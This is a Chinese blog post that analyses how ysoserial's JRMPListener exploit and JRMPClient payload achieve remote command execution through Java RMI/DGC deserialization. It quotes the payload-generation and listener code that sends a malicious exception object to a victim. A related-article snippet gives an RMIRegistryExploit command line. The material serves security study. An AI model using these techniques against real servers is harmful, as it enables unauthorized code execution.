ysoserial exploit/JRMPListener原理剖析

最新推荐文章于 2024-09-02 08:34:18 发布
最新推荐文章于 2024-09-02 08:34:18 发布
阅读量2.4k 收藏 5
点赞数
分类专栏: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qsort_/article/details/104969138
版权
本文深入解析了ysoserialexploit/JRMPListener的工作原理,详细介绍了利用JRMPListener进行攻击的过程,包括如何生成payload,以及gadget链分析。文章还探讨了JRMPListener与JRMPClient的交互机制,揭示了命令执行的触发点。
摘要由CSDN通过智能技术生成

ysoserial exploit/JRMPListener原理剖析

0 前言

上一篇文章讲了ysoserial exploit/JRMPClient的原理,本篇接着讲一下ysoserial exploit/JRMPListener的原理,相同的思路,我们结合着payloads/JRMPClient来分析。JRMPListener的攻击流程如下:
1、攻击方在自己的服务器使用exploit/JRMPListener开启一个rmi监听

2、往存在漏洞的服务器发送payloads/JRMPClient,payload中已经设置了攻击者服务器ip及JRMPListener监听的端口,漏洞服务器反序列化该payload后,会去连接攻击者开启的rmi监听,在通信过程中,攻击者服务器会发送一个可执行命令的payload(假如存在漏洞的服务器中有使用org.apacje.commons.collections包,则可以发送CommonsCollections系列的payload),从而达到命令执行的结果。

1 payloads/JRMPClient

1.1 Externalizable

在讲payloads/JRMPClient之前,我们先讲一下Externalizable,这是java提供的一个接口,实现该接口的类就具备了可序列化功能,下面总结一下它和Serializable接口的一些相同点与不同点:
1、实现Externalizable接口的类必须重写writeExternal(ObjectOutput out)和readExternal(ObjectInput in)两个方法,在这两个方法中可以自定义序列化和反序列化规则,而实现Serializable接口的类没有需要强制实现的方法。
2、假设类中有些敏感数据,我不希望在网络上传输该对象的序列化数据中包含该敏感数据,两种接口都可以实现:
(1)Externalizable接口,在实现writeExternal(ObjectOutput out)方法时,不对敏感数据进行序列化就可以
(2)Serializable接口,使用transient关键字修饰敏感字段,则该字段将不会被序列化。
对比一下,使用transient关键字修饰其实更方便。
3、两个各有特点,只能是根据不同的业务需求去选择使用。
下面我写了一个关于Externalizable的测试类,来进一步理解Externalizable:

public class Person implements Externalizable {

    private String username; //用户名
    private String password; //密码

    public String getUsername() {
        return username;
    }

    public void setUsername(String username) {
        this.username = username;
    }

    public String getPassword() {
        return password;
    }

    public void setPassword(String password) {
        this.password = password;
    }

    //在序列化Person对象时,只序列化username属性
    @Override
    public void writeExternal(ObjectOutput out) throws IOException {
        System.out.println("writeExternal is running ...");
        out.writeObject(username);
        out.close();
    }

    //反序列化Person对象时,只反序列化username属性
    @Override
    public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException {
        this.username = (String)in.readObject();
        System.out.println("readExternal is running ...");
    }

    //测试
    public static void main(String[] args) throws Exception {
        //如下代码将person对象设值后进行序列化,序列化后的数据存于字节流中
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        Person person = new Person();
        person.setUsername("zs");
        person.setPassword("123456");
        person.writeExternal(oos);

        //如下代码从字节流中获取序列化数据并对其进行反序列化
        ByteArrayInputStream bais = new ByteArrayInputStream(baos.toByteArray());
        ObjectInputStream ois = new ObjectInputStream(bais);
        Person person2 = new Person();
        person2.readExternal(ois);
        System.out.println("username=" + person2.username + " passowrd=" + person2.password);//结果为username=zs passowrd=null
    }
}

1.2 生成payload

以下为payloads/JRMPClient生成payload的代码,我添加了注释,其中通信所需的信息在后面分析中我们会看到其具体的作用。

public Registry getObject ( final String command ) throws Exception {

        String host;
        int port;
        //命令行获取ip值与端口值
        int sep = command.indexOf(':');
        if ( sep < 0 ) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        //以下信息都是连接JRMPListener通信所需信息
        ObjID id = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
        //这就是构造的payload,创建了一个Registry类型的代理对象,handler值为上面创建的RemoteObjectInvocationHandler
        Registry proxy = (Registry) Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[] {
            Registry.class
        }, obj);
        return proxy;
    }

1.3 gadget链分析

如下为作者给出的gadget链,可以看到有两部分,其实就是在DGCClient.registerRefs(Endpoint, List<LiveRef>)方法中,有两个方法调用,且都对反向连接JRMPListener有作用,后面调试时可以看到。
在这里插入图片描述
1、根据上面的gadget链,我们就在UnicastRef.readExternal(ObjectInput)方法中设置断点:
在这里插入图片描述
2、跟入LiveRef.read(ObjectInput var0, boolean var1)方法,可以看到通过反序列化获取到了在生成payload时,创建的TCPEndpoint(包含要建立socket通信的ip地址与端口号)、ObjID对象(对象唯一标识),并使用这两个对象生成了LiveRef对象(该对象的具体作用没进行分析)。
在这里插入图片描述
3、继续跟入到DGCClient.registerRefs(Endpoint, List<LiveRef>),这里就是上面给出的gadget链中出现两个分支的地方:
在这里插入图片描述
4、先进入DGCClient$EndpointEntry.lookup(Endpoint)方法:
在这里插入图片描述
5、继续跟入DGCClient$EndpointEntry构造方法,可以看到使用前面创建的TCPEndpoint与DgcID创建了LiveRef对象,并且生成了DGCImpl_Stub代理对象,到了这里就明白了, 其实payloads/JRMPClient也是通过DGC通信,进而反序列化恶意payload的 。最后一行代码就是创建与JRMPListener的Socket通信,由单独的线程负责:
在这里插入图片描述
6、DGCClient$EndpointEntry.lookup(Endpoint)分支分析完了,然后进入DGCClient$EndpointEntry.registerRefs(List<LiveRef>)分支如下,代码较长,而且不重要,这里就不贴了,直接到最后一行:
在这里插入图片描述在这里插入图片描述
7、进入DGCClient$EndpointEntry.makeDirtyCall(Set<RefEntry>, long)方法,还是直接到如下断点位置:
在这里插入图片描述
8、由于下一步调用的是DGCImpl_Stub.dirty(ObjID[], long, Lease)方法,前面我们也遇到过,DGCImpl_Stub类是无法调试的,于是直接查看源码,终于看到了熟悉的一幕,前面已经详细分析过了,这里就总结一下,第一个红框是交换一些信息,说明本次是远程调用,第二红框依然是发送一些数据,第三个框是处理响应数据。
在这里插入图片描述
9、到了这里后面的流程也很熟悉了,及时不调试,也能猜测到JRMPListener响应的恶意payload只能在下面两个地方触发:
(1)当响应的payload为异常类时,在UnicastRef.invoke(java.rmi.server.RemoteCall)方法中的StreamRemoteCall.executeCall()方法中触发的,如下,应该还记得,case1是正常,直接return,case2是发生异常时,这里会将异常对象反序列化:
在这里插入图片描述
(2)当响应的类为正常类时,则就在第八步图中的第四个红框中进行反序列化。
这里后面通过调试,发现是第一种情况,也就是JRMPListener响应回来的是一个异常类,就不贴图了,后面就分析一下exploit/JRMPListener

2 exploit/JRMPListener

由于这里代码量较多,因此就不一行一行写注释了,而且大部分都是通信中交换数据的,之前也分析过,这里就略过通信过程,直接挑一部分重点代码进行分析:

private void doCall(DataInputStream in, DataOutputStream out, Object payload) throws Exception {
        ObjectInputStream ois = new ObjectInputStream(in) {
        ObjID read;
        try {
            //这里读取到的是JRMPClient端发送的DgcID
            read = ObjID.read(ois);
        } catch (java.io.IOException e) {
            throw new MarshalException("unable to read objID", e);
        }

        //这里如果判断是否为Dgc调用,DgcID为[0:0:0, 2]
        if (read.hashCode() == 2) {
            ois.readInt(); // method
            ois.readLong(); // hash
            System.err.println("Is DGC call for " + Arrays.toString((ObjID[]) ois.readObject()));
        }

        System.err.println("Sending return with payload for obj " + read);

        //这里发送81,也是为了防止JRMPClient抛出transport return code invalid异常
        out.writeByte(TransportConstants.Return);// transport op
        ObjectOutputStream oos = new JRMPClient.MarshalOutputStream(out, this.classpathUrl);
        //这里发送2,就会进入分析JRMPClient时的第九步中第一种情况的case2中
        oos.writeByte(TransportConstants.ExceptionalReturn);
        new UID().write(oos);
        //这里生成了一个异常类,其中包含一个Object类型的属性,名为val
        BadAttributeValueExpException ex = new BadAttributeValueExpException(null);
        //这里将恶意payload赋值给了val属性,在反序列化BadAttributeValueExpException类时,val值也会被反序列化,从而触发命令执行
        Reflections.setFieldValue(ex, "val", payload);
        //将payload发往JRMPClient端,payload会被反序列化
        oos.writeObject(ex);

        oos.flush();
        out.flush();

        this.hadConnection = true;
        synchronized (this.waitLock) {
            this.waitLock.notifyAll();
        }
    }

如上代码注释写的很清楚了,这里也明白了在分析payloads/JRMPClient时的第九步中为什么会进入case2。

3 总结

1、如果RMIClient请求RMIServer时的ip地址和端口号是攻击者可控的,则都可以使用exploit/JRMPListener进行攻击(其是通过dgc通信进行攻击),例如RMIClient执行如下代码连接到JRMPListener,即可遭受攻击:

Registry registry = LocateRegistry.getRegistry("127.0.0.1", 9999);
Object obj = registry.lookup("xxx");

2、在一些特殊情况下,可以结合payloads/JRMPClient进行攻击。

hldfight
关注
专栏目录
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3505
ysoserial这款工具,堪称为“java反序列利用神器”。
漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
weixin_45556536的博客
11-27 2095
这里写目录标题基础知识漏洞原理涉及版本漏洞特征漏洞复现—CVE-2017-10271 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2018-2628 Weblogic T3协议反序列化漏洞CVE-2018-2894 Weblogic任意文件上传漏洞CVE-2020-14882 weblogic 未授权命令执行漏洞漏洞修复 基础知识 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性
ysoserial之JRMP源码分析(payloads.JRMPClient/exploit.JRMPListener)
weixin_45682070的博客
03-11 1426
前言 本来是想复现weblogicCVE-2017-3248漏洞的,这个漏洞使用了ysoserial的jrmp模块,开启rmi监听进行通信的,达到执行任意反序列化 payload。下文有些概念比较晦涩难懂,建议查阅其他资料配合使用。 JRMP协议是什么 JRMP全称为Java Remote Method Protocol,也就是Java远程方法协议。 一个RMI的过程,是用到JRMP这个协议去组织数据格式然后通过TCP进行传输,从而达到RMI,也就是远程方法调用。 JRMP是一个协议,是用于Java RMI
ysoserial exploit/JRMPClient原理剖析
hldfight
03-15 2962
0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是: 1、先往存在漏洞的服务器发送payloads/JRMPLIstener,使服务器反序列化该gadget后,会开启一个rmi服务并监听在设置的端口 2、然后攻击方在自己的服务器使用exploit/JRMPClient与存在漏洞的服务器...
ysoserial 使用教程
最新发布
gitblog_00240的博客
09-02 482
ysoserial 使用教程 ysoserial项目地址:https://gitcode.com/gh_mirrors/ysos/ysoserial 项目介绍 ysoserial 是一个用于生成利用不安全 Java 对象反序列化的有效负载的概念验证工具。它包含了一系列在常见 Java 库中发现的“gadget chains”,可以在特定条件下利用执行不安全的反序列化操作的 Java 应用程序。 ...
Java反序列化之ysoserial URLDNS模块分析,用微课学java高级开发
m0_64867092的博客
12-20 612
URLStreamHandler handler = new SilentURLStreamHandler(); 创建了URLStreamHandler对象,该对象的作用,后面我们会详细说到。 接着: HashMap ht = new HashMap(); 创建了HashMap对象: URL u = new URL(null, “http://lyxhh.dnslog.cn”, handler); URL对象: ht.put(u, “http://lyxhh.dnslog.cn”); 将URL对象作为Has
Yso-JRMPListener模块学习
why811的博客
08-30 197
ysoserial 中的会在指定端口开启一个 JRMP Server,其实现了对任意 RMI Client 的应答请求,会向任何连接其的客户端发送反序列化 payload。注意:区别这里的 JRMP Client 指的是发起 JRMP 请求的一方(下文以Client或者客户端称呼),既可能是 RMI Server,也可能是 RMI Client(两者都可以向 RMI Registry 发起 JRMP 请求)。
java 反序列化 ysoserial exploit/JRMPClient 原理剖析
whatday的专栏
06-26 3476
目录 0 前言 1payloads/JRMPListener 1.1 payload生成 1.2gadget链分析 2使用RMIRegistryExploit攻击上述开启的监听 3 exploit/JRMPClient 3.1分布式垃圾收集(DGC) 3.2exploit/JRMPClient代码分析 4 总结 0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是:...
jrmp协议_ysoserial JRMP相关模块分析(二)- payloads/JRMPClient & exploit/JRMPListener
weixin_39876145的博客
12-24 738
简介payloads/JRMPClient 生存的 payload 是发送给目标机器的,exploit/JRMPListener 是在自己服务器上使用的,payloads/JRMPClient 的利用,离不开 exploit/JRMPListener ,反之 exploit/JRMPListener 的利用,在上篇文章中,它是可以独立使用的这篇文章是记录 payloads/JRMPClient 的...
shiro反序列化漏洞
g1345444的博客
02-26 1041
查看到这里发现会传入前面序列化的数组和key值,最后再去调用他的重载方法并且传入序列化数组、key、ivBytes值、generate。这里调用crypt方法进行获取到加密后的数据,而这个output是一个byte数组,大小是加密后数据的长度加上iv这个值的长度。进行加密,该类中也有对应的解密操作。该方法的作用为使用Base64对指定的序列化字节数组进行编码,并将Base64编码的字符串设置为cookie值。这里执行完成后就拿到了ivBytes的值了,这里再回到加密方法的地方查看具体加密的实现。
Weblogic WLS Core Components 反序列化命令执行漏洞复现(CVE-2018-2628)
yang1234567898的博客
04-21 538
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 漏洞产生原因: 攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议
反序列化测试工具 ysoserial-master-v0.0.5 打包
05-21
用法 java -cp ysoserial-master-v0.0.5 ysoserial.exploit.RMIRegistryExploit 192.168.192.118 1099 CommonsCollections1 "notepad.exe"
java 反序列化 ysoserial exploit/JRMPListener 原理剖析
whatday的专栏
06-26 1735
目录 0 前言 1 payloads/JRMPClient 1.1 Externalizable 1.2 生成payload 1.3 gadget链分析 2 exploit/JRMPListener 3 总结 0 前言 上一篇文章讲了 《java 反序列化 ysoserial exploit/JRMPClient 原理剖析》 https://blog.csdn.net/whatday/article/details/106971531 ,本篇接着讲一下ysoserial expl.
ysoserial exploit/JRMPClient
洋洋的小黑屋
07-27 362
ysoserial exploit/JRMPClient 上一篇文章讲到,当服务器反序列化payloads/JRMPListener,即会开启端口监听。再使用exploit/JRMPClient模块发送payload,服务器就会把payload进行反序列化,从而完成进行攻击。 调用链分析 设置payloads/JRMPListener参数,端口号为1299,debug模式启动payloads/JRMPListener模块。 设置exploit/JRMPClient模块设置参数为127.0.0.1 1299
基于ysoserial的深度利用研究(命令回显与内存马)
2401_84488651的博客
06-20 1046
很多小伙伴做反序列化漏洞的研究都是以命令执行为目标,本地测试最喜欢的就是弹计算器,但没有对反序列化漏洞进行深入研究,例如如何回显命令执行的结果,如何加载内存马。遇到了一个实际环境中的反序列化漏洞,也通过调试最终成功执行命令,达到了RCE的效果。在实际的攻防场景下,能执行命令并不是最完美的利用场景,内存马才是最终的目标。本篇文章就在此基础上讲一讲如何进行命令回显和加载内存马。
ysoserial代码分析-TemplatesImpl
GalaxySpaceX的博客
08-15 891
ysoserial代码分析-TemplatesImpl
探索Java安全边界:YSOserial - 构建任意序列化漏洞利用工具
gitblog_00056的博客
03-20 426
探索Java安全边界:YSOserial - 构建任意序列化漏洞利用工具 ysoserialA proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.项目地址:https://gitcode.com/gh_mirrors/ys/ysoserial 项目简介 是一个...
Weblogic CVE-2018-2628 T3协议反序列化命令执行漏洞
读书 买花 长大
02-19 1018
CVE-2018-2628
【Web安全】Ysoserial 简单利用
buffedon的博客
12-30 7384
Ysoserial 的简单使用,包括命令使用与简单原理解释
use exploit/multi/handler
07-09
use exploit/multi/handler 是Metasploit框架中的一个模块,用于创建一个多功能的攻击载荷处理程序。该模块可以用于监听和处理多种类型的攻击载荷,包括反向Shell、Meterpreter、VNC、FTP等。使用该模块可以方便地管理和控制攻击载荷,从而实现对目标系统的攻击和控制。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值